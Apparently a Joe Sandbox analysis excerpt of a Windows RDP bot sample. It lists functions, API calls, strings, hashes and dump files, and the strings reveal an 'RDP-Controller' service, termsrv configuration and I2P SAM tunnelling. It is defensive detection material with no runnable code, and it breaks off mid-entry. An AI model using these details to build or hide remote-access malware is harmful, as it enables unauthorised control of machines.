String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
API String ID: 3718746087-844192579
Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
Instruction ID: e01c91c0d850d4620b15b8d2ce52bc628b1a7eea14f4368a29180dad8f852d5a
Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
Instruction Fuzzy Hash: E7511819B0D68B81FB239F21A9783BA52919F86FC4F440431DB4D4B7CBEE6EE9058704

Function 00007FFDA5BA3937 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 85memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA396E
WaitForSingleObject.KERNEL32 ref: 00007FFDA5BA399D
GetProcessHeap.KERNEL32 ref: 00007FFDA5BA39B9
HeapFree.KERNEL32 ref: 00007FFDA5BA39CA
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA39E1
Sleep.KERNEL32 ref: 00007FFDA5BA3A1F
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA3A2E
WaitForSingleObject.KERNEL32 ref: 00007FFDA5BA3A5A
GetProcessHeap.KERNEL32 ref: 00007FFDA5BA3A76
HeapFree.KERNEL32 ref: 00007FFDA5BA3A87
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA3A96

Strings

routine_gc, xrefs: 00007FFDA5BA3981
[I] (%s) -> Client gone(client=0x%llx), xrefs: 00007FFDA5BA3988

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
API String ID: 2654219296-2700516951
Opcode ID: 4387c822a17933dfd982bf28bb151515e8fb8fbc64b75f917438ce9af074396c
Instruction ID: 371a352af450154d6938b1aea7cdac88f5599a2ed314f6a29f20fee54aa19d92
Opcode Fuzzy Hash: 4387c822a17933dfd982bf28bb151515e8fb8fbc64b75f917438ce9af074396c
Instruction Fuzzy Hash: 91411F21B0BA4E83EF544F11E8703796260BF4AF66F190635CA2E463E6DF7DE9408359

Function 00007FFDAC12B501 Relevance: 21.2, APIs: 4, Strings: 10, Instructions: 181stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDAC12B594

Part of subcall function 00007FFDAC12AB26: strcmp.MSVCRT ref: 00007FFDAC12AB6E

strlen.MSVCRT ref: 00007FFDAC12B6BA
strcpy.MSVCRT ref: 00007FFDAC12B6E1
strcpy.MSVCRT ref: 00007FFDAC12B780

Strings

DESTINATION, xrefs: 00007FFDAC12B69C
RESULT, xrefs: 00007FFDAC12B63C, 00007FFDAC12B71E
REPLY, xrefs: 00007FFDAC12B725
NAMING LOOKUP NAME=ME, xrefs: 00007FFDAC12B6F1
NAMING, xrefs: 00007FFDAC12B72C
SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s, xrefs: 00007FFDAC12B608
SESSION, xrefs: 00007FFDAC12B64A
TRANSIENT, xrefs: 00007FFDAC12B684
STATUS, xrefs: 00007FFDAC12B643
VALUE, xrefs: 00007FFDAC12B749

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: strcpystrlen$strcmp
String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
API String ID: 245486318-5999096
Opcode ID: 38634489d7978dd11fad982d5f88a49f981e2d6265108d12591518f39eb3f4f8
Instruction ID: 3a76f54681f86be0fe2d73fab76598b3dc3c685df219291e60cae735b342f5e0
Opcode Fuzzy Hash: 38634489d7978dd11fad982d5f88a49f981e2d6265108d12591518f39eb3f4f8
Instruction Fuzzy Hash: 8871412BB0FA4281FA52972594703792290AF417F8F544332DDBE177D7DE2CE802834A

Function 00007FF70CAD1B75 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF70CAD1BF2
GetLastError.KERNEL32 ref: 00007FF70CAD1C25

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu), xrefs: 00007FF70CAD1C37
RDP-Controller, xrefs: 00007FF70CAD1BEB
svc_main, xrefs: 00007FF70CAD1C30, 00007FF70CAD1D1F, 00007FF70CAD1D4F
Service running, xrefs: 00007FF70CAD1D18
P, xrefs: 00007FF70CAD1C88
Service stopping, xrefs: 00007FF70CAD1D48
[I] (%s) -> %s, xrefs: 00007FF70CAD1D26, 00007FF70CAD1D56
, xrefs: 00007FF70CAD1C43
~, xrefs: 00007FF70CAD1C7F

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
API String ID: 3562457520-1478336053
Opcode ID: 91ed3e22107f3558c2c95dbba1a74d6c6945766dbd2abe62acd9c7db1e06b2d5
Instruction ID: f24b573bf0a6ef767a176357610bf8c2fc73215fc7ac2dd0dbe997a1356587f8
Opcode Fuzzy Hash: 91ed3e22107f3558c2c95dbba1a74d6c6945766dbd2abe62acd9c7db1e06b2d5
Instruction Fuzzy Hash: 8851F6D0E0C60782FB607B90BC90BBDA1909F15768FD40136D61F0A5EAEF5DA98593B1

Function 00007FFDAC12AFB0 Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 94memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDAC12AFF7
HeapReAlloc.KERNEL32 ref: 00007FFDAC12B00B
strlen.MSVCRT ref: 00007FFDAC12B05D
GetProcessHeap.KERNEL32 ref: 00007FFDAC12B080
HeapFree.KERNEL32 ref: 00007FFDAC12B091
GetProcessHeap.KERNEL32 ref: 00007FFDAC12B0A5
HeapAlloc.KERNEL32 ref: 00007FFDAC12B0B6

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

GetProcessHeap.KERNEL32 ref: 00007FFDAC12B0F8
HeapFree.KERNEL32 ref: 00007FFDAC12B109

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDAC12B0CF, 00007FFDAC12B0E7
sam3_send_req, xrefs: 00007FFDAC12B047
mem_realloc, xrefs: 00007FFDAC12B0E0
mem_alloc, xrefs: 00007FFDAC12B0C8
[D] (%s) -> %s, xrefs: 00007FFDAC12B04E

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Heap$Process$AllocFree$fflushfwritestrlen
String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
API String ID: 1135201459-1870638116
Opcode ID: 64ec105accf7e70dacae6fe03fe56eb3cbb995caed75091f8dc94bed95c71e06
Instruction ID: 08527c86223dab19f8a191ef446b3bd7dd660ac64ac7ca0c5199f28bc1a95530
Opcode Fuzzy Hash: 64ec105accf7e70dacae6fe03fe56eb3cbb995caed75091f8dc94bed95c71e06
Instruction Fuzzy Hash: C431C397B0BA4685FA92AF52E8603B96390BF85BE4F484035DD5E07397EE2CE505C309

Function 00007FFDA557D030 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDA557D0CE
GetProcessHeap.KERNEL32 ref: 00007FFDA557D101
HeapAlloc.KERNEL32 ref: 00007FFDA557D112
strcpy.MSVCRT ref: 00007FFDA557D16B
GetProcessHeap.KERNEL32 ref: 00007FFDA557D181
HeapFree.KERNEL32 ref: 00007FFDA557D192

Strings

-LTCMAS-, xrefs: 00007FFDA557D122
on_tick_expiry, xrefs: 00007FFDA557D0EB
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA557D1A7
-LTCSES-, xrefs: 00007FFDA557D130
XESS, xrefs: 00007FFDA557D13E
[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx), xrefs: 00007FFDA557D0F2
mem_alloc, xrefs: 00007FFDA557D1A0

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Heap$Process$AllocFreestrcpystrlen
String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
API String ID: 925994320-1558387473
Opcode ID: 9a6b8e21f566bbe8435919b3e5def1b32568444d3476a2dad9c2200182573ace
Instruction ID: 645848d7c5e033d5824c30d435de2cb431dc91122a328f3947332f236b81e4a5
Opcode Fuzzy Hash: 9a6b8e21f566bbe8435919b3e5def1b32568444d3476a2dad9c2200182573ace
Instruction Fuzzy Hash: AC41B269B0E64B85E6426F16D8683792BA1EF46F94F440834ED1E07393EF3CE445C718

Function 00007FF70CAD6FD3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF70CAD6FFE
strlen.MSVCRT ref: 00007FF70CAD7027
strlen.MSVCRT ref: 00007FF70CAD7033
strlen.MSVCRT ref: 00007FF70CAD7049

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD7091, 00007FF70CAD70C1, 00007FF70CAD70F1
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF70CAD712B
(path_sz != NULL), xrefs: 00007FF70CAD70B3
((*path_sz) > 0), xrefs: 00007FF70CAD70E3
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD707C, 00007FF70CAD70AC, 00007FF70CAD70DC
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF70CAD705E
NULL, xrefs: 00007FF70CAD715D
fs_path_temp, xrefs: 00007FF70CAD7057, 00007FF70CAD708A, 00007FF70CAD70BA, 00007FF70CAD70EA, 00007FF70CAD7124
(path != NULL), xrefs: 00007FF70CAD7083

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: 36219663468fdaef4b68b41003626b1b3e46fca3c279ed0071ccb873fe8e22c8
Instruction ID: 867d07f2ae0ecbdd10c99a986292ba400d1da1c2599e0417a2f5bea9f7507116
Opcode Fuzzy Hash: 36219663468fdaef4b68b41003626b1b3e46fca3c279ed0071ccb873fe8e22c8
Instruction Fuzzy Hash: E44141D1A0CA5791FA65BB14FC50BB9E761AF40788FC44232E64F4769DDF3CA9068360

Function 00007FFDA5BA2C99 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FFDA5BA2D44
accept.WS2_32 ref: 00007FFDA5BA2D6B
htonl.WS2_32 ref: 00007FFDA5BA2D9B
htons.WS2_32 ref: 00007FFDA5BA2DAC

Part of subcall function 00007FFDA5BA26B9: ioctlsocket.WS2_32 ref: 00007FFDA5BA26DF

WSAGetLastError.WS2_32 ref: 00007FFDA5BA2E5E
WSAGetLastError.WS2_32 ref: 00007FFDA5BA2E9A

Strings

[E] (%s) -> Failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA5BA2EAD
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA5BA2E71
[W] (%s) -> select timedout(sock=0x%llx), xrefs: 00007FFDA5BA2E3E
[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u), xrefs: 00007FFDA5BA2DF5
tcp_accept, xrefs: 00007FFDA5BA2DEE, 00007FFDA5BA2E37, 00007FFDA5BA2E6A, 00007FFDA5BA2EA6

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
API String ID: 2278979430-4175654481
Opcode ID: b62926433ff0ffdebe13f9ef1776f7045121dba30f513e78472fdd0571286397
Instruction ID: ef32885ff42002adcd13ea4a09460eec3098eae7344c4e9f562d0484c35e91d7
Opcode Fuzzy Hash: b62926433ff0ffdebe13f9ef1776f7045121dba30f513e78472fdd0571286397
Instruction Fuzzy Hash: 2751D332B0A68E86EB204B15E460379B250AF42FB6F144731EA7D07BD7DF7E94418704

Function 00007FFDA55DA870 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA55DA95C

Strings

(name != NULL), xrefs: 00007FFDA55DA8E5
main, xrefs: 00007FFDA55DA873
(var != NULL), xrefs: 00007FFDA55DA918
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFDA55DA9D5
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55DA8AB, 00007FFDA55DA8DE, 00007FFDA55DA911
version, xrefs: 00007FFDA55DA870, 00007FFDA55DA874
ini_get_var, xrefs: 00007FFDA55DA8B9, 00007FFDA55DA8EC, 00007FFDA55DA91F, 00007FFDA55DA986, 00007FFDA55DA9CE
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFDA55DA98D
NULL, xrefs: 00007FFDA55DA9EE, 00007FFDA55DA9F7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55DA8C0, 00007FFDA55DA8F3, 00007FFDA55DA926
(sec != NULL), xrefs: 00007FFDA55DA8B2

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-636894343
Opcode ID: 78d3a37ad1a2723e121ff0d4f19c21effae94ffce4a1e9da8ce3ba05e3596c26
Instruction ID: 8c92a8668e1662f5686d93dc42ea0a0c65e4aab396af91dd3e5427928c746a7b
Opcode Fuzzy Hash: 78d3a37ad1a2723e121ff0d4f19c21effae94ffce4a1e9da8ce3ba05e3596c26
Instruction Fuzzy Hash: A441487BB1A68FE1FA16CF01E8203B92260BB16B48F454132EA5C46397DF3CE556C348

Function 00007FFDAC0F1E00 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDAC0F1EEC

Strings

(var != NULL), xrefs: 00007FFDAC0F1EA8
NULL, xrefs: 00007FFDAC0F1F7E, 00007FFDAC0F1F87
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFDAC0F1F1D
(name != NULL), xrefs: 00007FFDAC0F1E75
(sec != NULL), xrefs: 00007FFDAC0F1E42
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFDAC0F1F65
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC0F1E3B, 00007FFDAC0F1E6E, 00007FFDAC0F1EA1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC0F1E50, 00007FFDAC0F1E83, 00007FFDAC0F1EB6
version, xrefs: 00007FFDAC0F1E00, 00007FFDAC0F1E04
main, xrefs: 00007FFDAC0F1E03
ini_get_var, xrefs: 00007FFDAC0F1E49, 00007FFDAC0F1E7C, 00007FFDAC0F1EAF, 00007FFDAC0F1F16, 00007FFDAC0F1F5E

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-636894343
Opcode ID: e2a42899c1c5944a9f729b1b8cf21693dae8af3d33541b423ce1529b3a229a29
Instruction ID: 44e3da0a8c745a6d5ff850fd037a0a5f5d859503627212caf0e64f460e295af6
Opcode Fuzzy Hash: e2a42899c1c5944a9f729b1b8cf21693dae8af3d33541b423ce1529b3a229a29
Instruction Fuzzy Hash: 2A413E62B0B64795FA158B00E8607F46360BF243E8F484136EA5D0A797DF7CE699D38C

Function 00007FFDA55DA6E9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA55DA7DD

Strings

(name != NULL), xrefs: 00007FFDA55DA75E
ini_get_sec, xrefs: 00007FFDA55DA732, 00007FFDA55DA765, 00007FFDA55DA798, 00007FFDA55DA7F6, 00007FFDA55DA834
main, xrefs: 00007FFDA55DA6EC
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55DA724, 00007FFDA55DA757, 00007FFDA55DA78A
version, xrefs: 00007FFDA55DA6E9, 00007FFDA55DA6ED
(ini != NULL), xrefs: 00007FFDA55DA72B
[D] (%s) -> Done(name=%s), xrefs: 00007FFDA55DA7FD
NULL, xrefs: 00007FFDA55DA854
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55DA739, 00007FFDA55DA76C, 00007FFDA55DA79F
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFDA55DA83B
(sec != NULL), xrefs: 00007FFDA55DA791

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-4168131722
Opcode ID: f28ac3a370511aca7b6d72bdae0abc74e9b18329ff8aaa93d83dbeb4d1707fc4
Instruction ID: 1af12ea63b443e01ac6aadffb76fcc4272cca70ad06704c042848557fea360db
Opcode Fuzzy Hash: f28ac3a370511aca7b6d72bdae0abc74e9b18329ff8aaa93d83dbeb4d1707fc4
Instruction Fuzzy Hash: D2412B6BB1A5CBD1FA56DF10E9603B52260AB06B88F444032DE1D06797EF3CE556C348

Function 00007FFDAC0F1C79 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDAC0F1D6D

Strings

(ini != NULL), xrefs: 00007FFDAC0F1CBB
NULL, xrefs: 00007FFDAC0F1DE4
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFDAC0F1DCB
(name != NULL), xrefs: 00007FFDAC0F1CEE
(sec != NULL), xrefs: 00007FFDAC0F1D21
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC0F1CB4, 00007FFDAC0F1CE7, 00007FFDAC0F1D1A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC0F1CC9, 00007FFDAC0F1CFC, 00007FFDAC0F1D2F
version, xrefs: 00007FFDAC0F1C79, 00007FFDAC0F1C7D
[D] (%s) -> Done(name=%s), xrefs: 00007FFDAC0F1D8D
main, xrefs: 00007FFDAC0F1C7C
ini_get_sec, xrefs: 00007FFDAC0F1CC2, 00007FFDAC0F1CF5, 00007FFDAC0F1D28, 00007FFDAC0F1D86, 00007FFDAC0F1DC4

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: strcmp
